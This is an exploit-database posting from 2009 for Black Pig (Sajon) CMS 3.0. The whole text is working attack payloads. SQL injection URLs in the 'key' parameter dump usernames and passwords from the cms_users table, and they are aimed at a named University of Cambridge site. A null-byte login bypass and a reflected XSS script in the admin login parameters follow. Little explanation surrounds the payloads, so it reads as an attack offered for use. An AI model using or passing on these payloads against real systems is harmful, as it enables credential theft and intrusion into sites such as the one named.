blackpig-sqlxss.txt
Posted on 26 August 2009
============================================= Black Pig (Sajon) CMS 3.0 SQL Injection + XSS ============================================= 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' __ /'__` / \__ /'__` 0 0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 1 /_/ /' _ ` / /_/_\_<_ /'___ / /`'__ 0 0 / / / / \__/ \_ \_ / 1 1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 1 \____/ >> Exploit database separated by exploit 0 0 /___/ type (local, remote, DoS, etc.) 1 1 0 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1 #[+] Discovered By : Inj3ct0r #[+] Site : Inj3ct0r.com #[+] support e-mail : submit[at]inj3ct0r.com #[+] visit : inj3ct0r.com , inj3ct0r.org , inj3ct0r.net Product : Black Pig (Sajon) CMS 3.0 site: http://www.blackpig.co.uk/ Investigated the University of Cambridge. =] The file name may change, but is vulnerable parameter key 1) SQL inj3ct0r Example: http://www.enterprise.cam.ac.uk/archive.php?key=-24+union+select+username,2,password+from+cms_users-- http://www.enterprise.cam.ac.uk/archive.php?key=-24+union+select+version(),2,concat_ws(char(58),group_concat(username+separator+0x3a),group_concat(password+separator+0x3a))+from+cms_users-- SQL inj in admin, when authorization Example: POST formloginuser=%00 2) XSS http://www.site.com/cms/admin.php POST action=login&gomodule=>"><script%20%0a%0d>alert(KU-KU,7750312847)%3B</Script> The same is true in goid,gopage Admin is: site.com/cms/ Disclosure ways: http://www.site.com/cms/admin.php in the login box set ' Table: cms_users Fields: username,password ThE End =] Visit my proj3ct : http://inj3ct0r.com http://inj3ct0r.org http://inj3ct0r.net # ~ - [ [ : Inj3ct0r : ] ]
